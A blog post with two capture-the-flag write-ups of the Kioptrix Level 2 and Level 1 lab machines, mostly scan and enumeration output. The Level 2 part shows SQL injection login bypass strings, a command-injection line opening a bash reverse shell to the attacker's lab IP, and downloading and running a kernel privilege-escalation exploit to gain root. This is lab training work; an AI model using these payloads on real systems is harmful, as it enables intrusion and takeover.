崔芷菘的网络日志 Senior System Operations Engineer 致力于成长为一名优秀的道德黑客。 Zabbix6.0官方译者。

Kioptrix Level 2 Writeup

Objective

Get root access via any means.

Enumeration

Find the target ip:

└─$ sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ad:36:56, IPv4: 10.10.10.129
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
10.10.10.1      00:50:56:c0:00:08       VMware, Inc.
10.10.10.2      00:50:56:ed:49:99       VMware, Inc.
10.10.10.133    00:0c:29:50:1f:1f       VMware, Inc.
10.10.10.254    00:50:56:e5:1b:02       VMware, Inc.

The target ip is 10.10.10.133.

Detect ports, services and some known vulnerabilities:

# Nmap 7.91 scan initiated Fri Nov  4 06:58:51 2022 as: nmap -A -p 1-1100 -oN nmap_result.txt 10.10.10.133
Nmap scan report for 10.10.10.133
Host is up (0.0020s latency).
Not shown: 1094 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp  open  http     Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open  rpcbind  2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            752/udp   status
|_  100024  1            755/tcp   status
443/tcp open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_ssl-date: 2022-11-04T06:35:42+00:00; -4h23m24s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_RC4_64_WITH_MD5
631/tcp open  ipp      CUPS 1.1
| http-methods: 
|_  Potentially risky methods: PUT
|_http-title: 403 Forbidden
755/tcp open  status   1 (RPC #100024)

Host script results:
|_clock-skew: -4h23m24s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov  4 06:59:06 2022 -- 1 IP address (1 host up) scanned in 14.75 seconds

Since it has port 80 open, so next I will try opening its web pages.

Exploitation

There’s a login form. So the first thing came to my mind is sql injection.

I tried several sql commands to make a quick test. I tried the following for both username and password:

admin’

admin’–

admin’ or ‘1’ = ‘1

And luckily the last one worked! I logged in successfully:

Now there’s another web page:

It tells me I can execute ping tests. Usually this might have command injection vulnerabilities. To verify my hypothesis, I added ls command after ping:

which apparently worked: The directory content is listed after ping. So next I tried to inject a bash reverse shell instead of ls command. But before that, I should start a listener:

Now it’s time to start injecting bash shell:

The full command is below:

127.0.0.1 & bash -i >& /dev/tcp/10.10.10.129/4444 0>&1

OK, I’m in.

But I’m user apache, not root. So I need to do a privilege escalation. I’m trying looking for its kernel vulnerabilities first. Got its kernel version and type:

Searching for vulnerabilities via searchsploit:

──(kali㉿kali)-[~/kioptrix_lv2]
└─$ searchsploit Linux Kernel escalation

In the output below, I’m going to use the payload 9574.txt:

┌──(kali㉿kali)-[~/kioptrix_lv2]
└─$ searchsploit -m linux/local/9574.txt                                                     1 ⨯
  Exploit: Linux Kernel < 2.6.19 (x86/x64) - 'udp_sendmsg' Local Privilege Escalation (2)
      URL: https://www.exploit-db.com/exploits/9574
     Path: /usr/share/exploitdb/exploits/linux/local/9574.txt
File Type: ASCII text, with CRLF line terminators

Copied to: /home/kali/kioptrix_lv2/9574.txt

In the content of the txt file, it leads me to another file which I think maybe the real payload script:

After having downloaded the compressed file, I start an http server on the kali linux for sharing the file:

┌──(kali㉿kali)-[~/kioptrix_lv2]
└─$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...

On the victim VM, downloading the file and decompress it:

bash-3.00$ wget http://10.10.10.129:8000/9574.tgz
--05:26:16--  http://10.10.10.129:8000/9574.tgz
           => `9574.tgz'
Connecting to 10.10.10.129:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,359 (4.3K) [application/x-gtar-compressed]

    0K ....                                                  100%  415.71 MB/s

05:26:16 (415.71 MB/s) - `9574.tgz' saved [4359/4359]
bash-3.00$ tar zxvf 9574.tgz
therebel/
therebel/exploit.c
therebel/pwnkernel.c
therebel/therebel.sh

So there comes a subdirectory named therebel. Switch into it and run therebel.sh:

bash-3.00$ cd therebel  
bash-3.00$ ls -l
total 20
-rw-r--r--  1 apache apache 9922 Sep  2  2009 exploit.c
-rw-r--r--  1 apache apache  782 Sep  2  2009 pwnkernel.c
-rwxr--r--  1 apache apache 1471 Sep  2  2009 therebel.sh
bash-3.00$ ./therebel.sh
sh: no job control in this shell
sh-3.00# whoami
root
sh-3.00# 

Alright, well done!

Kioptrix Level 1 Writeup

Objective

Get root access via any means.

Enumeration

Find the target ip:

└─$ sudo arp-scan -l                                                           
[sudo] password for kali: 
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ad:36:56, IPv4: 10.10.10.129
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
10.10.10.1      00:50:56:c0:00:08       VMware, Inc.
10.10.10.2      00:50:56:ed:49:99       VMware, Inc.
10.10.10.131    00:0c:29:61:73:cd       VMware, Inc.
10.10.10.254    00:50:56:e5:1b:02       VMware, Inc.

The target ip is 10.10.10.131.

Detect ports, services and some known vulnerabilities:

# Nmap 7.91 scan initiated Tue Nov  1 22:51:26 2022 as: nmap -sV -p1-1023 --script vuln -oN nmap_result.txt 10.10.10.131
Nmap scan report for 10.10.10.131
Host is up (0.0025s latency).
Not shown: 1018 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| vulners: 
|   cpe:/a:openbsd:openssh:2.9p2: 
|         CVE-2002-0640    10.0    https://vulners.com/cve/CVE-2002-0640
|         CVE-2002-0639    10.0    https://vulners.com/cve/CVE-2002-0639
|         CVE-2002-0083    10.0    https://vulners.com/cve/CVE-2002-0083
|         CVE-2011-2895    9.3    https://vulners.com/cve/CVE-2011-2895
|         CVE-2006-5051    9.3    https://vulners.com/cve/CVE-2006-5051
|         CVE-2006-4924    7.8    https://vulners.com/cve/CVE-2006-4924
|         CVE-2003-1562    7.6    https://vulners.com/cve/CVE-2003-1562
|         CVE-2010-4478    7.5    https://vulners.com/cve/CVE-2010-4478
|         CVE-2002-0575    7.5    https://vulners.com/cve/CVE-2002-0575
|         CVE-2001-1459    7.5    https://vulners.com/cve/CVE-2001-1459
|         CVE-2001-1380    7.5    https://vulners.com/cve/CVE-2001-1380
|         CVE-2001-0816    7.5    https://vulners.com/cve/CVE-2001-0816
|         SECURITYVULNS:VULN:1956    7.2    https://vulners.com/securityvulns/SECURITYVULNS:VULN:1956
|         CVE-2001-0529    7.2    https://vulners.com/cve/CVE-2001-0529
|         SSV:64479    5.0    https://vulners.com/seebug/SSV:64479    *EXPLOIT*
|         SSV:6192    5.0    https://vulners.com/seebug/SSV:6192    *EXPLOIT*
|         SSV:60656    5.0    https://vulners.com/seebug/SSV:60656    *EXPLOIT*
|         SSV:16847    5.0    https://vulners.com/seebug/SSV:16847    *EXPLOIT*
|         PACKETSTORM:73600    5.0    https://vulners.com/packetstorm/PACKETSTORM:73600    *EXPLOIT*
|         PACKETSTORM:54435    5.0    https://vulners.com/packetstorm/PACKETSTORM:54435    *EXPLOIT*
|         EXPLOITPACK:63CFD85A8DA29BF22328E65C685CBBA3    5.0    https://vulners.com/exploitpack/EXPLOITPACK:63CFD85A8DA29BF22328E65C685CBBA3    *EXPLOIT*
|         EDB-ID:3303    5.0    https://vulners.com/exploitdb/EDB-ID:3303    *EXPLOIT*
|         CVE-2010-5107    5.0    https://vulners.com/cve/CVE-2010-5107
|         CVE-2007-2243    5.0    https://vulners.com/cve/CVE-2007-2243
|         CVE-2006-5052    5.0    https://vulners.com/cve/CVE-2006-5052
|         SSV:66339    4.9    https://vulners.com/seebug/SSV:66339    *EXPLOIT*
|         SSV:10777    4.9    https://vulners.com/seebug/SSV:10777    *EXPLOIT*
|         EXPLOITPACK:B5E7D30E7583980F37EF6DBC0B05FBC3    4.9    https://vulners.com/exploitpack/EXPLOITPACK:B5E7D30E7583980F37EF6DBC0B05FBC3    *EXPLOIT*
|         EDB-ID:8163    4.9    https://vulners.com/exploitdb/EDB-ID:8163    *EXPLOIT*
|         CVE-2009-0537    4.9    https://vulners.com/cve/CVE-2009-0537
|         CVE-2012-0814    3.5    https://vulners.com/cve/CVE-2012-0814
|         CVE-2011-4327    2.1    https://vulners.com/cve/CVE-2011-4327
|         CVE-2008-3259    1.2    https://vulners.com/cve/CVE-2008-3259
|         SECURITYVULNS:VULN:1953    0.0    https://vulners.com/securityvulns/SECURITYVULNS:VULN:1953
|         SECURITYVULNS:VULN:1608    0.0    https://vulners.com/securityvulns/SECURITYVULNS:VULN:1608
|         SECURITYVULNS:VULN:1499    0.0    https://vulners.com/securityvulns/SECURITYVULNS:VULN:1499
|         SECURITYVULNS:VULN:1488    0.0    https://vulners.com/securityvulns/SECURITYVULNS:VULN:1488
|         SECURITYVULNS:VULN:1474    0.0    https://vulners.com/securityvulns/SECURITYVULNS:VULN:1474
|         SECURITYVULNS:VULN:1439    0.0    https://vulners.com/securityvulns/SECURITYVULNS:VULN:1439
|         SECURITYVULNS:VULN:1344    0.0    https://vulners.com/securityvulns/SECURITYVULNS:VULN:1344
|         SECURITYVULNS:VULN:1262    0.0    https://vulners.com/securityvulns/SECURITYVULNS:VULN:1262
|_        SECURITYVULNS:VULN:1233    0.0    https://vulners.com/securityvulns/SECURITYVULNS:VULN:1233
80/tcp  open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /test.php: Test page
|   /icons/: Potentially interesting directory w/ listing on 'apache/1.3.20'
|   /manual/: Potentially interesting directory w/ listing on 'apache/1.3.20'
|_  /usage/: Potentially interesting folder
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
111/tcp open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1           1024/tcp   status
|_  100024  1           1024/udp   status
139/tcp open  netbios-ssn Samba smbd (workgroup: EfKMYGROUP)
443/tcp open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| ssl-ccs-injection: 
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|           
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|       http://www.cvedetails.com/cve/2014-0224
|_      http://www.openssl.org/news/secadv_20140605.txt
| ssl-dh-params: 
|   VULNERABLE:
|   Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
|     State: VULNERABLE
|     IDs:  BID:74733  CVE:CVE-2015-4000
|       The Transport Layer Security (TLS) protocol contains a flaw that is
|       triggered when handling Diffie-Hellman key exchanges defined with
|       the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
|       to downgrade the security of a TLS session to 512-bit export-grade
|       cryptography, which is significantly weaker, allowing the attacker
|       to more easily break the encryption and monitor or tamper with
|       the encrypted stream.
|     Disclosure date: 2015-5-19
|     Check results:
|       EXPORT-GRADE DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: mod_ssl 2.0.x/512-bit MODP group with safe prime modulus
|             Modulus Length: 512
|             Generator Length: 8
|             Public Key Length: 512
|     References:
|       https://www.securityfocus.com/bid/74733
|       https://weakdh.org
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
|   
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: mod_ssl 2.0.x/1024-bit MODP group with safe prime modulus
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_3DES_EDE_CBC_SHA
|     References:
|       https://www.securityfocus.com/bid/70574
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|_      https://www.openssl.org/~bodo/ssl-poodle.pdf
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
| smb-vuln-cve2009-3103: 
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|           
|     Disclosure date: 2009-09-08
|     References:
|       http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov  1 22:56:51 2022 -- 1 IP address (1 host up) scanned in 324.87 seconds

Try opening web pages:

Just a static web page, nothing more.

Use nikto to detect outdated services, directories as well as some vulnerabilities:

└─$ nikto -host 10.10.10.131 -output nikto_result.txt
- Nikto v2.1.6/2.1.5
+ Target Host: 10.10.10.131
+ Target Port: 80
+ GET Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep  5 23:12:46 2001
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-27487: GET Apache is vulnerable to XSS via the Expect header
+ HEAD mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ HEAD OpenSSL/0.9.6b appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ HEAD Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE 
+ OSVDB-877: TRACE HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: GET Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: GET Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: GET Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ GET mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ GET ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: GET /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS).
+ OSVDB-3268: GET /manual/: Directory indexing found.
+ OSVDB-3092: GET /manual/: Web server manual found.
+ OSVDB-3268: GET /icons/: Directory indexing found.
+ OSVDB-3233: GET /icons/README: Apache default file found.
+ OSVDB-3092: GET /test.php: This might be interesting...
+ GET /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ GET /wordpresswp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ GET /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ GET /wordpresswp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ GET /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ GET /wordpresswp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ GET /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ GET /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ GET /shell?cat+/etc/hosts: A backdoor was identified.

This might get you a remote shell:

I forgot to detect OS. Run again:

sudo nmap -O 10.10.10.131
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-01 23:59 EDT
Nmap scan report for 10.10.10.131
Host is up (0.00088s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
443/tcp  open  https
1024/tcp open  kdm
MAC Address: 00:0C:29:61:73:CD (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Since it has samba service enabled, we can enumerate this via enum4linux.

$ enum4linux 10.10.10.131 > enum4linux_result.txt

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Nov  1 23:44:32 2022

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.10.131
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==================================================== 
|    Enumerating Workgroup/Domain on 10.10.10.131    |
 ==================================================== 
[+] Got domain/workgroup name: MYGROUP

 ============================================ 
|    Nbtstat Information for 10.10.10.131    |
 ============================================ 
Looking up status of 10.10.10.131
    KIOPTRIX        <00> -         B <ACTIVE>  Workstation Service
    KIOPTRIX        <03> -         B <ACTIVE>  Messenger Service
    KIOPTRIX        <20> -         B <ACTIVE>  File Server Service
    ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
    MYGROUP         <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
    MYGROUP         <1d> -         B <ACTIVE>  Master Browser
    MYGROUP         <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

    MAC Address = 00-00-00-00-00-00

 ===================================== 
|    Session Check on 10.10.10.131    |
 ===================================== 
[+] Server 10.10.10.131 allows sessions using username '', password ''

 =========================================== 
|    Getting domain SID for 10.10.10.131    |
 =========================================== 
Domain Name: MYGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ====================================== 
|    OS information on 10.10.10.131    |
 ====================================== 
[+] Got OS info for 10.10.10.131 from smbclient: 
[+] Got OS info for 10.10.10.131 from srvinfo:
    KIOPTRIX       Wk Sv PrQ Unx NT SNT Samba Server
    platform_id     :    500
    os version      :    4.5
    server type     :    0x9a03

 ============================= 
|    Users on 10.10.10.131    |
 ============================= 


 ========================================= 
|    Share Enumeration on 10.10.10.131    |
 ========================================= 

    Sharename       Type      Comment
    ---------       ----      -------
    IPC$            IPC       IPC Service (Samba Server)
    ADMIN$          IPC       IPC Service (Samba Server)
Reconnecting with SMB1 for workgroup listing.

    Server               Comment
    ---------            -------
    KIOPTRIX             Samba Server

    Workgroup            Master
    ---------            -------
    MYGROUP              KIOPTRIX

[+] Attempting to map shares on 10.10.10.131
//10.10.10.131/IPC$    [E] Can't understand response:
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
//10.10.10.131/ADMIN$    [E] Can't understand response:
tree connect failed: NT_STATUS_WRONG_PASSWORD

 ==================================================== 
|    Password Policy Information for 10.10.10.131    |
 ==================================================== 
[E] Unexpected error from polenum:


[+] Attaching to 10.10.10.131 using a NULL share

[+] Trying protocol 139/SMB...

    [!] Protocol failed: SMB SessionError: 0x5

[+] Trying protocol 445/SMB...

    [!] Protocol failed: [Errno Connection error (10.10.10.131:445)] [Errno 111] Connection refused


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0


 ============================== 
|    Groups on 10.10.10.131    |
 ============================== 

[+] Getting builtin groups:
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Power Users] rid:[0x223]
group:[Account Operators] rid:[0x224]
group:[System Operators] rid:[0x225]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]

[+] Getting builtin group memberships:
Group 'Power Users' (RID: 547) has member: Couldn't find group Power Users
Group 'Backup Operators' (RID: 551) has member: Couldn't find group Backup Operators
Group 'Guests' (RID: 546) has member: Couldn't find group Guests
Group 'Print Operators' (RID: 550) has member: Couldn't find group Print Operators
Group 'Account Operators' (RID: 548) has member: Couldn't find group Account Operators
Group 'System Operators' (RID: 549) has member: Couldn't find group System Operators
Group 'Administrators' (RID: 544) has member: Couldn't find group Administrators
Group 'Users' (RID: 545) has member: Couldn't find group Users
Group 'Replicator' (RID: 552) has member: Couldn't find group Replicator

[+] Getting local groups:
group:[sys] rid:[0x3ef]
group:[tty] rid:[0x3f3]
group:[disk] rid:[0x3f5]
group:[mem] rid:[0x3f9]
group:[kmem] rid:[0x3fb]
group:[wheel] rid:[0x3fd]
group:[man] rid:[0x407]
group:[dip] rid:[0x439]
group:[lock] rid:[0x455]
group:[users] rid:[0x4b1]
group:[slocate] rid:[0x413]
group:[floppy] rid:[0x40f]
group:[utmp] rid:[0x415]

[+] Getting local group memberships:

[+] Getting domain groups:
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]

[+] Getting domain group memberships:
Group 'Domain Users' (RID: 513) has member: Couldn't find group Domain Users
Group 'Domain Admins' (RID: 512) has member: Couldn't find group Domain Admins

 ======================================================================= 
|    Users on 10.10.10.131 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================= 
[I] Found new SID: S-1-5-21-4157223341-3243572438-1405127623
[+] Enumerating users using SID S-1-5-21-4157223341-3243572438-1405127623 and logon username '', password ''
S-1-5-21-4157223341-3243572438-1405127623-500 KIOPTRIX\ (0)
S-1-5-21-4157223341-3243572438-1405127623-501 KIOPTRIX\ (0)
S-1-5-21-4157223341-3243572438-1405127623-502 KIOPTRIX\unix_group.2147483399 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-503 KIOPTRIX\unix_group.2147483399 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-504 KIOPTRIX\unix_group.2147483400 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-505 KIOPTRIX\unix_group.2147483400 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-506 KIOPTRIX\unix_group.2147483401 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-507 KIOPTRIX\unix_group.2147483401 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-508 KIOPTRIX\unix_group.2147483402 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-509 KIOPTRIX\unix_group.2147483402 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-510 KIOPTRIX\unix_group.2147483403 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-511 KIOPTRIX\unix_group.2147483403 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-512 KIOPTRIX\Domain Admins (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-513 KIOPTRIX\Domain Users (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-514 KIOPTRIX\Domain Guests (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-515 KIOPTRIX\unix_group.2147483405 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-516 KIOPTRIX\unix_group.2147483406 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-517 KIOPTRIX\unix_group.2147483406 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-518 KIOPTRIX\unix_group.2147483407 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-519 KIOPTRIX\unix_group.2147483407 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-520 KIOPTRIX\unix_group.2147483408 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-521 KIOPTRIX\unix_group.2147483408 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-522 KIOPTRIX\unix_group.2147483409 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-523 KIOPTRIX\unix_group.2147483409 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-524 KIOPTRIX\unix_group.2147483410 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-525 KIOPTRIX\unix_group.2147483410 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-526 KIOPTRIX\unix_group.2147483411 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-527 KIOPTRIX\unix_group.2147483411 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-528 KIOPTRIX\unix_group.2147483412 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-529 KIOPTRIX\unix_group.2147483412 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-530 KIOPTRIX\unix_group.2147483413 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-531 KIOPTRIX\unix_group.2147483413 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-532 KIOPTRIX\unix_group.2147483414 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-533 KIOPTRIX\unix_group.2147483414 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-534 KIOPTRIX\unix_group.2147483415 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-535 KIOPTRIX\unix_group.2147483415 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-536 KIOPTRIX\unix_group.2147483416 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-537 KIOPTRIX\unix_group.2147483416 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-538 KIOPTRIX\unix_group.2147483417 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-539 KIOPTRIX\unix_group.2147483417 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-540 KIOPTRIX\unix_group.2147483418 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-541 KIOPTRIX\unix_group.2147483418 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-542 KIOPTRIX\unix_group.2147483419 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-543 KIOPTRIX\unix_group.2147483419 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-544 KIOPTRIX\unix_group.2147483420 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-545 KIOPTRIX\unix_group.2147483420 (Local Group)
